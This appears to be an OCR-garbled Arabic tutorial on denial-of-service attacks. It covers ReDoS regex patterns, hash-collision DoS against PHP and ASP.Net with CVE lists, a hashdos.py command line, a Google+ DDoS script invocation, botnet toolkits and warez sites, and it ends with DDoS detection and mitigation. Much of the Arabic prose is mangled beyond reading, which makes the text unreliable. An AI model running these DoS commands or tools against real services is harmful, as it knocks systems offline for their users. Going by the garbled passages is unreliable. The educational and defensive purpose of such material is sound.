.ajUxj c^jjua ^1 dj^LkAJU j^ilj ^1 ^ evil cr^^ " Reg ular Expression" regex ^ 

VVli Evil Regexes *&*S 
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(a+)+ 

([a-zA-Z]+)* 

(alaa)+ 

(ala?)+ 

G*a){x} I for x > 10 

ls j1\ ^regular expression" AjiiaiJl jjjUjII ^.v^im* cjULuLjll <jc dxaJ] e5b.i sjjSlall 5ij*-»3l ^v^imj ( -»->\g «ll 
JLkjL 1 g i oij Regexes j-^ l^j V^j .^>Llaill (JJa*j < _ t_i ^ (^jll j < ** ^ j ■ <-> diili..i<Jl JLjjjIj «Evil Regexes 

_ jlaaJ] <Ajajc j»Uaill <J*^j 'Evil Regexes u**. ( -.->< ^ <^\t t^v^imall 




M* 0} 



IIS/ 

Web Application 




DataBase 



Web Browser 



IDS/IPS 



.Evil Regexes ^ ^ gr^ '"regular expression" 3jtt*i*l l j^Uill ^Ua WEB CjULL aLL J£ ^ 

6 (WAF)^J ^lllaJ 4-^--^ (J^J '(<J J"^ all jlfraJI ^glc Uiajl (J^^J J' jJJ^ j^-^- c^-^-) S-^J^ ^Lq (JlaxJ ^jl 

_L_JJj (J^lflaJ Aa. j lij JUaII J^f^ 

String userName = textBoxl.Text; 

String password = textBox2.Text; 

Regex testPassword = new Regex (userName); 

Match match = testPassword.Match(password); 

if (match.Success) 

{ 

MessageBox.Show("Do not include name in password."); 

} 

else 
{ 

MessageBox.Show("Good password."); 

} 

"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" j ^Vim^ l " A (([a-z])+.)+[A-Z]([a-z])+$" J^j-? f ^^ l ^ l^j ^ c> 

."hang" Ji«j3i L^^JJ ^jjoj liA jli jjuJI 

Hash Collisions DoS Attacks 

PHP - ASP.Net Hash Algorithm Collision DoS 4- 

.hash algorithm collision 
. ASP.Net j Python Java 'PHP JS* i«3L5« 
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"Hash functions" ^ e^ 1 ^ ^ Ul * JH "{Hash map) lW ^LJ^" J "(TMi table) lW JjV 
ikjjjJI tij^Vl fjSl! (oaa^lt <xJ JUJI "(key) ^jjUJI" "Identification Value" ^ 

■ C5^-^ (JjjlA (Jj^ (J^juJI ^jJajJ .(^j-a^juol! <jl jic (JtlxJl ^5^) 




Jl$l\ dj^j jUVl c> jiS ^ .^jjliJ! l^ii^j ^jll ^a f VI jj^JI" fjill Udij "keys" ^jliJI ^a "plSjjll" ^1 

"Development framework" <^ i> lU*^ "hash collision" 
.t_fl^JI ( jnWfl l liA JLoj jjj ^jS c_jLai^j ^bSlI <u£*j "generation function" *L&VI 3Jta u?^\ 
<UL^. ^ <il3i t . ujujj Uui <j j£^<JI <^JIsla3I j ^^ic j j-<^ jj ^1 <_£^jj c — J^-M cJ^^ ^£11 6 ^ ^J-^ ( — * l3J- 

jSiU (jjoij J jj £>1a t^lj POST HTTP s-^a J^U. ^ ^jU> ^31 ^ CjjIjU^ 2 J^J-? ^ * J^Ji lW^ 

£§1 jit d^A uiflLuaH Ll£j CjUjjKiII j CjULU! 

• Java, all versions 

• JRuby <= 1.6.5 

• PHP <= 5.3.8, <= 5.4.0RC3 

• Python, all versions 

• Rubinius, all versions 

• Ruby <= 1.8.7-p356 

• Apache Geronimo, all versions 

• Apache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22 

• Oracle Glassfish <= 3.1.1 

• Jetty, all versions 

• Plone, all versions 

• Rack <= 1.3.5, <= 1.2.4, <= 1.1.2 

• V8 JavaScript Engine, all versions 



4-uIa ls 2li^ 



PHP Hash Function Weakness ❖ 
"Daniel J.Bernstein's X 33 Times with Addition" 1 j* li*j DJBX33A ^^11 *ib php fci 

; JIjII j^3t C5 Ic JjUui Ia^ j£ (Jj^j (jl clA^ C5^^ 

/* Hash function created by Daniel J. Bernstein x 

33 Times with Addition */ 
hash_t bernstein_hash(const unsigned char *key) 

{ 

hash_t h=0; 

while(*key) h=33*h + *key++; 

return h; 

} 

.$_POST c>M J c£b POST HTTP ^ ^> t> ^ M> j^k ^ ^ ? 

8 <jjfL U SjIc Ainlt ai^J POST S-^a C5 juoSVI ^aJl (.> £ji3t ti& J^L* Aiix^Ja ^>^i Aillt t3JWt aifc tju>n 

Jjj l_a jjoj ti$i '"multiple collisions" ^^*1<JI cjU1,^>^V1 cju>n jl IgiLi ^ ^t ^jSII (jiasu ^ ci& ^J* tit jSl j <ciuljU_ix> 

iphp.ini L <*-^l*-<<Jt *>i& ajj ^3 tit CjIcLuj ^olmj ^jt (j^j <^i3t *L<»^Jt u^a 
max_input_time (default -1, illimited) 
max_execution-time (default 30 seconds) 

4<JU3t ^t j£Vt <LuoLaj .a^Axla CjUlSa JLujjU ^tg-^t ^ tit CjL^Jt ^ £ jilt tigJ Jlxi JluiJ t bikjlt \ * '< «J V jjSlI" ai* < laaJt * jjoJ 
^3 jj CL^^Jt 4-lJjlt ^t IgJLuijt ^aJJ L ^il\ JA^Jt ^jl 1 * a J^ j^JaJj flXjJalt ti^J <L^ll<Jt "exploit" J^-*^ L>* 

IjSl^l 3Jh ^ CjUt^Saj^aVt 

Ld = {'OVEz', T:FY f , '2VG8 f , ^VH' +chr(23), ^VD'+chrCm+SS) 

ASP.Net Hash Function Weakness ❖ 
yr* j DHBX33X *ib "farms" ^ "object Request" ^ ASP.Net <^ 

.Meet-In-The-Middle >^ A "Daniel J. Bernstein's X 33 Times with XOR" J J-^t 

U^klaui 100-90 is* lW^W AjjSjaJI <^JlxJt 6^ j b^luJJ <jt (j^Ai i ASP.Net (JJJ^ f j^Jfc jj ^jj (^ilt fi^lgjtll 

jl jSaj ^t ^U^Jt l-l^ 3JU Jjj jl 4Jili CjUIL JL-jU ^l^Jt flS tit t^SUJt 6 iA ^ .^tj POST HTTP 

HTTP c^lj ^ASP.Net g?^ mu 11 ^ u 

application/x-www-form-urlencoded or multipart/form-data 

PHP Hash Table Collision Practice Attack ❖ 

^ cr^^j ■ u^*l£ ci^ c> HashCollision-DOS-POC ^ ^ "Exploit used" *^ ^««W JL&\ 

https://github.com/FireFart/HashCollision-DOS-POC 

2.2 g-^M ls^- J 1 ^ 1 liA -PHP Hash Table Collision U*e Vli« „ jaJi I ^ ^ 

.7 jj^jjj ;Jj^sll ^Lkj .5.3.8 J-i^aVI Cjli PHP s^j 11 f- 2 ^ 

Apache Geronimo: CVE-20 11-5034 
Oracle Glassfish: CVE-201 1-5035 
PHP: CVE-201 1-4885 
Apache Tomcat: CVE-201 1-4858 

^joij l^jjoj Pythonbrew . J*^^ ^if^^ 2.7 4^ ^ 'Pythonbrew lp^ 

. ( Pythonbrew -^^^ cJ^-^- a \^^*^ ^j) uj^^ ciit jt^-at < alia a 

I^Vl^ C^^Jt jxJt .Ua c^^^ <&UlaJ ^ j£j 

$ python hashdos.py -u http://192.168.16.16/index.php -v -c 500 -t PHP 
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roott'ibt : 



•a python hiihdas.py u http://f5.224. 



'ir>fll#x.php -v -c 53& -t FHFfl 



Google+ HTTP GET Request DDoS * 

Sj.jtall CjLd^Jl £A <Jj 4L_fl^Jl Sjjuitixi -laJJjJ V L_kxjJa3l JalfiJ J^IsUjoj! 1 lj£ aJ 4il t flj£ ^jc <Jtla jjoij L_fl jjuj ^judkll I^A J 

^ jjll li^ ^jl ^j-djJaj (jl 1 jj£ &J V DDoS (j/^*^ L3 ^-ajudj L*-g t^Ajjjll JjUajll (jlajC &JJJ^ CllLLa£ Jc (JaslSI Jc 

.<KAa1I ^L^sh I Jc. jC. jla j>» J'j^ V 4jjSj]1 

CjUlial "^^jui^jjj" GOOgle+ ^JC-Lai^VI CjI^jJoII ^\ \klui\ Ijj^ial t^jjJUajVI 4_jj^alj£]| ^ <C ja^ a t^^jJaxa *--^J ^ 

u^h ?I^<L> j *<-iJ*il tA^ 1 (. p df J .doc uj^ ^ fc^O o*- 1 -^ (> ^311 j HTTP GET 

.ciia jll ^jjoij J diUlLlt cjUaj ^LsU Google+ jf?^ * cr^'j ^L^j^VI 

HTTP JAhjj* 

(J^. j^. ^jI j^. ^j-d S^jujUx CjUIUI ^j-<i Sjjj^ lSLjjj] (J^aaII (j-<^ t^JI CjI £^ jj ^i^j^all (JL^-^VI 4 ^ > <^> ^'qVill (jj^ 

.AjJjA qC* L_Lua^3l ^a^C 6^1^. Ljajl (JJ'^ (3 ^ ^-^>.nj A Jjuj I1a .IgJ ^^.Jjjll JjUajll j 

http://www.lo0.ro/2011/08/29/google-plus-ddos-attack-script -M jll i> <L*^ ^ ^ ^j^* t> f ^ ^ 

Jllall J& a^\^U\ "http://www.ihteam.net " IHTeam Jjja I^IS c^^^j 
$ ./ddos.sh http://www. victim- website.com/some-file-url/file-name.mp3 1000 

THE BOTNET AS A DDOS TOO! 



diaj "botnet" uj^ ^ u.. 1 ^ <s ,5^^aJI ^jUij^JI t . ujujjj] ^ j^gll ^j^j cJ lS^^ ^ > ^j- u^^^ 

^ijoaj ^^jll <ln^Jl lIjLi^jJU is-\a ^''^^j-g jj" ^juAj l^J] La Ullc. j lAijI^ jj jJAx^ll 6j^j>.l *^J^ djlc jA^a- ^Sjj^j 

( jc <j^aLk]| cjIj jjjjJI 4£jjuj CjWI ^^ic SjiajjuJI ^^ic ^jjj^la t"lierders" j' j^jj^^ ( . ^ 1 ^ .f^ 0 j trt ^« o^^W*^ 

,c_jL<i jIslaII 

fj\ ciilj jjjjII c-jU > J JjU U£) CjVI 20^000 5^ ^ i^jlo '2006 ^ c> IjW^I 

Zeusj <TDL-4 'Conficker 'BredoLab j^VI dijj jJ! c_j1£jjuj ^Ua jl£ Liajl t(c ^^1 1 c-uaal 1^1^ q^sS 

qc> ^jjj V La ^i-J ^IaxjjojI ^^ic ^akjai ^1 Jja ^jxi 6jjj£ djjj jj CjI^jjuj j^-Li (j^j Li !jjj£ .CjVVI ^jjj^LJI ^^ic I^jI jj^.L 

^Jc. jJaJ ^jl! CjIj JJjjll f\ lull dbJa JC djJjjjVl A^JjuJ ^^J^ ^^Jld ^^Jc djL!>lcVl LpaxJ l^l^kloaV jJl ^ jV j^ 100 

^jujUJI CjIj^VIj Altix-all <JJ5j3l <3 jai-JI ia^a Ljj£i j ^ ^joiJ Lu» t(^jJl ^fl jVj^ 200 ^ J^^ C> 120'000-80'000 
CjLl^xijjJl ^glc Jali^Jlj COJJ^VI f djlj^l £-J>^J ^alc UJ^ ~* (j-* 6 jL^-^^ ^ (* L3^^\ 

V CjLa^JI AjJa AjL^J ^Jjj jJl ^j-d C fljj^JjJ jlaJl (j-d jjl ^I^JjojI j 6^5J^.V1 A^JjaJl 6 j^J>l J ^a^l J^Jl ^J^T* ^SJ^ L5^\ 

. jjki ^ J! jj 



"Blended Threat Toolkits" itjli^l cjIjjI 

6^xjujj31 ^Uaj c . ujujj c allkj ^jl (j^-ftj ^^jll j 6<j31j3I jj^aUxJI ^ J£ jl (j^asu o^lc "Blended Threat" CjI^j^jII a > ^Ti 

.^cll 4L^3jxJlj t^l^J^llj tJLlxJl Lff^) ^^Vl <L^.j-j 

j&j ^jl^J! cjl^j^il! ^> jii*j jj^jjj ^ <xjU3I cjIjjVi c> :Windows network service program - 
c> ^j^j L£ l (gU nn ^ g*\ jA\ lS^^ c> <Jj>^ Firedaemon . Firedaemonc5^ j^Ljj 

sjIc s jkiJL eJ ij Firedaemon jl jll cjVL^£U "Network Sockets" ^f^l ^ ^UL,V! 

.backdoor shell jVj 'IRC bounce program 'FTP 

m ^ (jjj^-VI ^jjjjjJa^ll •^^j <j1^a31 a£jjuoH ^\ kj > n j ^^£3 ^.1^1 1 ^cLoaj* <ilik-<JI a£jJo3I cj! > ^i^la ^ ^jaxJI ; Scanners 
mscan TCP banner grabbers uj^ 3 u' c> 'synscan simple SYN scanners ^ jj^j 

. ( http://www.nmap.org ) nmap j^i J ^ djL^la 
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■W^? SYN J UDP u 1 * JJ^ t> ^ J : Single-threaded DoS programs - 

L>* J - ^ J*^ 6 ^ (JjxjujJ j L_flJjJaJt Jt <J ja*Jt Jj> > >n ( . La>J ^1 g a\\ A (J^asu AjJa <Ul»i (jj^J J) (j^J Syilk4 

.Power bot ^jVt Jc- s jii ^ Jit IRC ^ tkU jt < ^1 jVI Ja^ 

J-LaaJL (u^j^ c!jL<i^A ^jjicLjaj (jjiJ! Ij iL<ill/cjl-ia ^j;^ jt) (jj^^l g <^ ^-^>.>Lj ^FTP iAn FTP server 

.JjjIkJt L_flJjJaxJt Jj dilaLJl 

jxj cjU^ Jt j (jj^ill j C5 li^ jJI) jLJI UiiJt cjULJI j) ;An IRC file service (Warez) bot 

a jiS IRC Cj Jt .Warez bot Warez ^jL ^Jt cj Jt jl cJj^Jt .Warez 

jVI .Direct Client-to-Client (DCC) protocol Jj^Asjj IRC J * j** f '^^j ^al^ l& J& 

.P2P ^ i. it t^a IRC S j^i 

^Auil <aJjuJ Ja (jc) Clj^ijVt ^JjJ Ja (jC 4 - a j 4_iC^)juj ^)JC. <L JaJ IgJU jjJ £<L Jilt L_J jjuilaJt £cxat^)J ^.IxJj; (Warez) jj^J 

^^ua j Ai^jjoj j A j > ^)fisu jjt jit (Jj-aaJ J 

L-jUtj f^liVt Uiajt ^^-istj (Jj Jaia £Lx*t jJt <J1gj V jjl jJtj l_i jjujI^. ^t Jj^aVt J c^-^j wares ^ aK3 lAjj^j Warez 

U3j^ <Ld^)a^<» jjt jltj. jjlj l^-jt J*J Z J^ S L -^^>^ ^f u "\ ^dJJj L^llAaJ aJJ ^^jlt djUUJt (JA tilli JJC. ^Ic-Vtj L_J jjoaL^Jt 

Cxij±i^\ ^ JUt jt^L Ja*^> ^ jjUII <SjLiiJt Jt ^^jj lg-L^j j 
I^^a Cijjjlilt ^t j-<» ^jujt (j-aj ;CjliL<Jt A£jLai>i ^t j-<» (Jaa^jII *L<»^. ^ jSj ^at j>» jt diijjj ^t j>» (j-a L^liAaJ ^t j-<Jt <illj ^^Ic 
kickass.to 
thepiratebay.se 
rarbg.com 

skidrowcrack.com 

rlsbb.com 

arb-gb.com 

Ljajt j j^-lislt ^ aaldlt dil^jjaJt ^A a ^' cJ^^ 6 ^ > *^ J V l^jj J L— Lia> 6jJj£ ^^f^ J-<^ J 

B XHQ t**l>nM ^J^>*-J^ Cjl^JjaJt (JA J^^^ *^J^^^ A ubftaJt dit jluolt (^ia ^jjJ CjI^jjuj 

t^loJ dlia. (jxitj t^ Jjlala fUaJ jAj ^ jt ^t Jt (jjjia (jc; aJJ jjt jit ^t jSjJjoJt CjULJt <!^UJ ^Uaj <jt IRC XDCC Bot 

jt ^L!t Ia jjaijj ^^jlt £i it j-<Jt ^joit j-<i j jjj^I j f^laVt j a jqj > >i ^<Jt CjliUt jjou j ^jJa j cilj£UiUa l^il^U^ j CjlilxJt ^ hVimt ^ Aj^aJt 

^ j U sjIc IRC s^kJt ^Uilt ^ j^t cjU^ ;lijt j£i U£ ;An IRC DDoS bot or DDoS agent - 
cron J inetd Oj^j ( <j > ^^ t ^ Firedaemon c> g-atjJt J£ c} clA^ .3 kVfo ^\ t Cjt^^ilt 



^ jliixiVt \it > cjjUt ^^xj J^Jij U l^jli ; c-Wt J^oij J*J ^> kits ^t^kiujt iia :Local exploit programs 
jj^l^dl] ^joij tiAj .password sniffing (Jj^^ c?^^ c^^^t ^^klaixJt c_jLai^ ^ l ^j^" ^2 JLa. ^k ^Ikilt 

.^jlLxJt ( bjJaJt ^^Ic UUj ^t jilt Ail£ ClliJJJ tSUi ^su ^jSaJ <Jaii3t ^JC j t^Llilt *6jt^VU 

c^^j ^ c> J 5 ^^ ^Uiu£t Jt U ^-aailt ^t jj Jt lik jj^Jt ; Remote exploit programs 

,^kt £2* j-o 4 ^ a\ L-jl^M] (j^Ual ^ Ita << t aj^aII ^ t,^**u«t jt CtiL <j^aL^Jt 4^ unit Jt ^ ^1 ^ a\\ (jUaj ^Jjuj jj] 1 a *\ iklLaat 

<jt diAj JJ^ ^t ^jjj jUa.Vl c> J ^ 6i 4? o**^ ^ ^-^^ Jj^^ ^ :System log cleaners 

jt (J'^nV(J^jj J SyslOg 6 <Jtl<Jt cJ^f*^ J^) ^ *^j'^t JauaJt dAiLJ c ^ilajj CjUIaC tilLiA .t LijJn^t ^ jL^ajt Jc 

CjULJtj Unix wtmp J Windows Event Logs <J15JI lW^ J&) binary J^Ji CjULJ jt t (Apache log files 

.(lastlog 

J ^UaJt Jt J^ijlt sjUIojV backdoors j^j^J :Trojan horse operating system program replacements 

QjAjLi Ullc- (jjrt^l Jt tdit Ja^Jt/djliLJt j tdiVlj^jt A£jjoi j t^jj^^l $ a\\j 4_x-alaJl CjUIxx]) J ja* j J ja^ ?? L_J^aj" JJaJ cJ*^ 

^JjixjaLilt aUaJ J 4_ia.jlaJt ^tjVt (J^aau Jt^fLojlj 

.cJ j^-^ Jj? ' ^ jjualt cjLJSj cAA uiaJt ^Ldjoat ^3jju^ g <iH ^.^>.>ij sniffer ( ; ^ j2 ; Sniffers 
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"Implications" Jftl 



^jjal j cJ^^ ^ <pj^ dbdj CjI j^VI o^asu .AimaJl £cx*!^)i3! ^ ^l^cl ci i» ^ Packets tormS ccurity . org ^jial £^ 
,3J j^oij l^%fkj ^i^oj V script kiddies ^jjal j j^c- j^VI (jiaxJtj o^^J ^joij < \&*\ \ 4-1^ j ^l^kioaVI 
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(Detection and Mitigation of High-Rate DoS Attacks) o-jJ <> uLiLUtj O^t 10.7 



aAA (JlxJ Jala all J^-^l <J&LaJj CliLJalall £yz AiAaJl <JI j ^Iuj S^C Ala j^. DDoSj DoS ^ ^ <jl cs - ^ 

aijaJI fnU DDoS ^-a^a J o^aij jjI cljIc^U^ jj jll "hacktivism" J^-^ .CjIau^I 

oliijl Jc <J jj^^J! J fr<< ^ (jjojj lIiIaja^j <j) (*ft^ cs-^- .^-^j^t Cy* ajAslU (j^l c^J^ ls* DDoS Jft j^j^l 

J CjUaJb AJa ft^LjaJt CjI j-> nl jIujVI jVI J^ ^J»J V d)l aW)a\\ ^ AjAjJI l"CSOs" cjH^ ^oSa^ll Cj) <Jala 

a-uIUlU .(Jjjj^ 4_^al^<J a l^J <jaj|jJI I gjLajuj CjUJai<JI Jaia Z3 'Neustar ^ ^ ji W^^>^ ^-^^ 

CjI £lx»J ( jj jl jll j SWitcheS ^5-^ J^) ^jft^l IPSS J *SO^ L)' J"^^ CI ^\ aola ^jl J-dUi CjLJal<Jl ^ ^ <aIa*Ji 

.tiLJ oj^tn &A& .'LdAkjl t ■ 

DDoS fck * "firewall" ^ 4- 

DDoSj DoS i> ^ (>VI Oft UdJL) 2 Radware's ERT £*t5 *2012 ^ ^ 

l-l^ cjL^j* J5U> " JjUI" ^UU jll ^jJI s j^J o-a^i? ERT .201 1 ^ c^j^ lW*j ^ill j 

jAjj <j| lLli^ _4jjoLijj3! ^1 jxl\ Cilia IPS ♦ J ^A^LolaH ClaLauoaj^l] AjI a^JI jIa^. <J1ijI£ CjVI^JI j-Q X32 **— J ^JJ '^AaJl 

^ iS^ill cjVU^jI M '"stateful devices" ^j^^ "firewall" uU^' 

jjaall JL-a2! J jAiJI Iaa ^ J£ ci^j '"connection table" ^-jVI^VI J ^ Cj^L^aJI oi^ J£ cl^j^ ^ lA^^ 
(j jixxj* <jIa^JI jl^a. 0^ "connection table" ^-jVl^aj*Vl J ja*. .I^j J ^as^ 4^ jj^ djVt^l l^iSj <j| ^ 

0^-3 'C-HJ^ ^ cJ^-^- tt^Ui iaLudil (.5^3 liA J ^ lajullll CIjVIj^jVI L_flWl CjIjjoiC. a ^ 'Qj djLauuj^Jl 

is* "connection table" cjVU^jVI JjAa. iiiiJ t^iirk y± Jil "connection table" ajVU^jI JjAa. J aja^ 

^ tgjii ^ jj^alll AixjaJ 4_jUaJI jlAaj (j-aUJI "connection table" ^-jVI^jVI J ja*. J jj^a j ^ .o^jll ^ * * jfi 

"Firewall" ajI^JI jiAa. ^ j Ji^li Jl jj V 

Radware Security Survey: Which services or network elements 
are (or have been) bottleneck of DoS? 
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Internet pipe Firewall 



IPS/ IDS 



Load Balancer The server SQL server 
(ADC) under attack 



https://www.facebook.com/tibea2004 
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'Challenges In DDoS Attack Mitigation" lhj^ <> < ijiViti cjLj^j 



a g II CjIa jJjUjjuj (j-a ^J^xJl <J .L-LiiaJillj < flJo£ll <J 4 )* <jj£j U Lllc. DDoS Jx^J Jll c-jUjaaVI c> ^jAxJI <^5Ua 

4_inJl jl CijjljVI jjjJa J t . Ujujj (jl <jLai (j-a V- JJJ^ ^li ^ J Jc 'VnjV' A^$y^ <J£ 6<Lu^a3I 

(j^ J l^ilc L_fljlxl<Jl (JjS (jx» I^I^JjojI s-IjoiJ (jl (j^J S-^J^ a ^ o , ^ t . ilia <JiLa ^JaJjudJ <CjjjuuJl CjLAl-<JI / aialall 4£jjuoU Ajj^jII 

J£ tcilli Jl AiUbVU .3JI J£l J CjUim lJVI jl lU^II c> ^ J l£ ^ J J* ^ jUVI 

IP f ^ 1 A alia a ill) Ala dlli L_flWI j-a ^-Ij (J^ cJ*^ Jj^-^J IP ^ (J^J^ f* J J JJJ^ 

,^.1 jll ^ j^-ll jAa^q j AjAaj l_ixj^3I j* uj-^ u^^j ^ 4 Header J*-* j jjj^ 
tilli j ."rate limit rule" l!^*^1I ^ j-^ s^clS aIa^j ml j& DDoS ^ <■ ajiaal ^^uin (j-^l^ cJ^-^ 3Jl*£ lgi£J j 3 Injun 

Jl (Jj^aj J^l ^1-* J] (J 1 ga^Vl ^ laJLu^Q (Jjl^ lij .^-C j^jjuIaII JJ^>a1I ^^)^- (_>^J 4_Lu^xJl ^LlujVI 6,1^.1 j (j^lj 6 (jJ^>^l ^^>^ 

jjib LI jj l^J jl <1 ^ ^c. jll JL^sjVI Lpaaj 6 " rate limit rule " J^-^ll ^ s^clS JjS ^ <j ^ j^ ^li ^^-^Vl ^aJI 
1^ s^iLo jjc. (Jj^j Lft o^lc l^ili lil t^jjjcjjuj jjiillj (Jjjc jjuall (Jj^^jjoiaII ^jjj V "rate limit rule" cJ^*-^ ^^15 
c^j "links" ^-j^a j 4-n * . u ill Cjli dij jjjVI ^1 lP 3 *^ La^- "Slashdot effect" 3-6^ ^ j^^- 'u^ ^ c 

. jLufll ^ "flash crowd" j' ^> yi ;^>i_^! 

gj^ "out-of-state packets" c> ^ J^j^ c^j u^j^ c^-W^ U^^'^ ' U yr^j ^f^^ j 1 ^^ 

CJJJjjll ^ jlL ^jaJl Jl^j] (i^jia .TCP J J^JJ^ iS'^ J*^\ L?^UI C5 LiLull 4-l£jA! ^ jU. IgJLujj] ^JJ y-jJl TCP 

^ tiinsJI JL^jV! 11a CjU jkJI ^ Jala^lb lJ^JI ^^1! ^(SYN-ACK ^J>^ ACK ^J>^ 

Jjt^a. ^ CIjVIj^jVI 1^ (jj^aJ £A J-dlxjll 1 g j£ aJ V - a ^jli tlLLoj ^jJa j& ,<J (j^aLaJ! JU^jVI <Jj"^aJ! 

4^^^, l " \ \\ ^ |ij lj laal Sjj laJ a daLij^J a laJLujJ ^jjjj^II 6^Lja>» ^)5^l 4_^aj^aiw<i (J jla. ^jc ^paJ^aull .(Jl^ (JJ^ d iVlj^a^VI 

J^tll jaJl djlia^J blllujl JjJ-<Jl c LiaaH diUll l!^*^ J t^JlaJl ^ 

(J-al*jU 4-j^aLk c LiaJ CjU^jj! jIujI ( ; lUaJJ jll j t"l()W and SlOW" i— A^ds l^ajl (jSl j A-L<LaLaJl CjLa^JI Ja^S I j^AaJLuoJ a! ^1^1^11 
(JlL<» CjIj^I J li^aJ (jlj 4<C j^jjuLg j^JJ (JAslaj a! jj^ajj <C j^)juL<JI Jj^-all ^^>^- ^ J^ iS J^' s " s tdjLo^Jl oi^ (JlLd 

L-LiiaJill CjU^jjI jloal ^^1 1^1.^*1 >>iU CjI ^^(gti ^-<uuaJ Uui 6^. JaJ JAslaj ^j^l j <C jjjoui ^3^" L - u ^ R.U.D.Y.J SlOWlorfS 

diljja J^lk <£jJoJ! Jc 4£jJall ^£ jLJI JjLaJ 5-lj^l a ja^-ll I^A Jla ^jc t aJjlll 4i£xuJl Jfuall ^1 .I^AjujS ^aJJ ^3 jll Aj>lJ^jll 

Jc jl£ lil i JUaII J^ ."low and slow" <J^ f j^^^ U-*-*^ ^ cr^^ ^^^^ 6 ^ <ijtL» j ^^UJI Jjt_uu1I 

( . lllaJJj CjIcLuj (JJiASk ^^jJaki a laJLud^ll ^jl^ lili ^' Q Q- all ^a^V -la^J J^-^ HTTP '"^ ' "V J^^* J (3^^^ C^ 1 ^ (J^f^ 

-C 5j^l ^ilol CjUI j^I Jl 4^.U*J f 4->/" UJ^ ^ AiL^ill (jjaij ^UjV HTTP ^ 1000 

AjuLuj <Lja J^J '(SSL) 4l*V! (jJdjlLJl <Lia J L_kxjJall Jallj ^1 laJL ul Cj^LojI J^lj ^JJ lal^ll ^^i.VI J^-H (J^A 3 (J^H 
a I IsJLujI (J^ylk (j* Lujoj Vj tdjUUill (j>» Sjj£1a1I jjjjujjll (ilflj jjjjujjll jU^-j (J^^A 3 (JC- .HTTPS (J J^J^ J " laJLudJ 4-^jll j^^il 

\c jjj^ll cjUUall ^nlj Jc^ IjjlS JjIj V J^ cJ^JI ^^UJI jjl UUj Jl^j jl ^I^aII j^ jliill s^lcj" J SSL 

L-likJ jUlUj ;*6^)ijaui ^LaJ! Jl Jj^ll ^^>^- (J^ (> — ^ L-LiiaJillj t ftjuj^ll J ^jlill SSL (JJJ^I Jc- ^.laJl ( ■ la^a djl^aA 

diSj J I^juq (J-dlxjllj jl 4x.jjjL<i (jj^J (jl Jj^lj (jl cJ^~ ^jl J-^H ^I^ILujVI a ijj£ 4jUr.j Ulaj jj£j La Ullc. jllj- (ilill ^jj (jl 



jjj-aII J 3 j±ul]| uLiu£ CjUjSj Jp djlaj 

J^l^ (jxi (jj^J (jl J»-^ ci^^ll ^ J>^l Jc- t fljuo^ll CjUjSj l^ilc j^JJ jll ^-1>->UJ^)1I 4 laiill (jl Jl JjIjoiJ CjULjajiill L_ iLd^A jAx-d <Jt_nia 
^CjULjajiill CjUiakA cJ 1 ^*-^ ^^jl cJ^*^ (jl cJ^I^ a\\ ^ja Jill Jj^ll ^^)^ J^ liA 4^1 ,A£jjoi3I JJ^ ^^>^- J jjolIII L_flLau£l 

IjU^I (> CjUjSjAI J^ <*j\U1 CjU^II ^ < L^ill "signature detection techniques" ^£ ^ J 

Jill (JjjLojVI iaiJ Jj^au t a I laJLual J^lk (j-d <£jjuaJ! JJ^ ^^>^- ^1*J ij^juoll (jC t fljuj^ll diLl^J tl^ilc L_fl^)*j3l dlAljuJ JxilU jll 

c La£3l djUjaj .(JjjLujVI JaaJ Jj^>xj3I < LLilt (jc Ij^ c^j^jj jllj jjj>JI ^j^- J ^iUill CjVI^JI c fljuj^j Aj^IxJI a£jJo!I <Jc. j^j 
."Zero day attacks" ^jj*^* cjUl^JI t ai *^<i jc Sj^ll ij^JJI c Lai£ (j^ J Aij^All CjIas^JI ^Ja <ll*i jiill (jc 
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jl t("6^Jr ! j^. ialLajj j& j jiaU^ ^jj) UUj JatLJ <UjLi ^ "Mitigation approaches" c fo-^ l 

<Ja*-g ^lijjl ^-g-^-i A-iSLjal Jjl (jsyusy^k* j\ ^(SjjJaLaJl <jl ^LmVi dlUi jl Jc ^jlmti IAjjjIj £*) JJ^Jl (jUlkl 
tAllll AjjouIU .CjjS jSJl J 4jbJt ^ 4_JjjjjJa3lj AjjujIujVI CjUlklallj 6 JjVl jA L_flj£^i JluiJ li^J ji&Vl ^t^l <jli J^A <>a . JJJ"A\ 
^^c. c fljiaj Jc ,a£jjoJI C5 ic SiLuJl JJ^>^ JJ&-^ JJJ - ^ ^^P" -^-^1 ^ C—U^ (j! t3*/ 1 J 

4_u£i3l a^A Jj^j tdua jjll Ul CjU^kJl ^j^j Jiasu V ciUij t^jlxu* ^ J] <jil£3l CjUiLaJlj <jil£3l CjUjL^jVI 

^jjjJ 4il 6 4 Ui-vN ^; .(jj^kl LaUi tJllxJl (J-IJjuj Jc .^j-nlla^l (JJ^A *^J^ CjU^j c*1Ua j^^^ IIa J^Ij (j-a ^^11 (j^-a-a 

J 6^31 j (j ^ - ^jLl^.VI (J^axJ J <J-<^ (j^ cl£^ a< V'*^ J Aj^IxJI JJJ-<Ji .oiLuoll JJ^Jl 4-^^>^> -JaLftJ) (J^A? ^-^^^ 

^a Jll "flash events" cfi^ cjI^U ^^.^ La ^>a^ ^ Jll<JI cJ^f^ ^Jc- 'J-^Aj ^ j ."^LuJI" ^ jLJ3 CjljJjj^ (jj£lui tl&^&Ua 
C5 lxi3l ^jjj^ill laaa (jjjJ AjI 4qjq^ ^^ic c <K ^ ^alili ttilli C5 lc S j . jj^Jl ^j^J ('^J^ ^J^) j <j^lLi Cjlclalil 

."jj^J! cil jU!" ^ jU! 11a 

"Recording and/or measurement of certain parameters of interest" c^li CjUIx^ ^Ua jl/j 

"Data analysis" lSJ^ 

jj^<J! ialLajj jl ^Lnli jJ Ai^^U! ^ J aJLu^^U J^^j) ^1 ^A Ja Ja^. jl c^^i ^ jLoill t iLlL^aJ <J j^. jl jail ^ 1> ^ 

"Parameters of Interest and Approaches Used" ^ ^VnnAtt g^llj S^lill cjUkAJI 

a£j^. ^jc j^xlll ^jj Ui *^lc .(egress ^^>*^ j) ^f*^ jj^>^^ ^j^- j ^ingress 

."Wte (or 63;^) /second" / (^jW j') "packets/second" j j^IVh^X ^(jj^JI jl) 

'"source/destination IP addresses" IP oJj^ /j^^Jl ojj^ <JH*1I ^ ^^aVI cjli J^ljJI Jxu^ij 

^ ji^ cjL-I^I ^ j^j^l 4iL^VU .(ICMP j UDP 'TCP ^> J*) J>j^ jj^l ^j^j ojj 1 ^ 

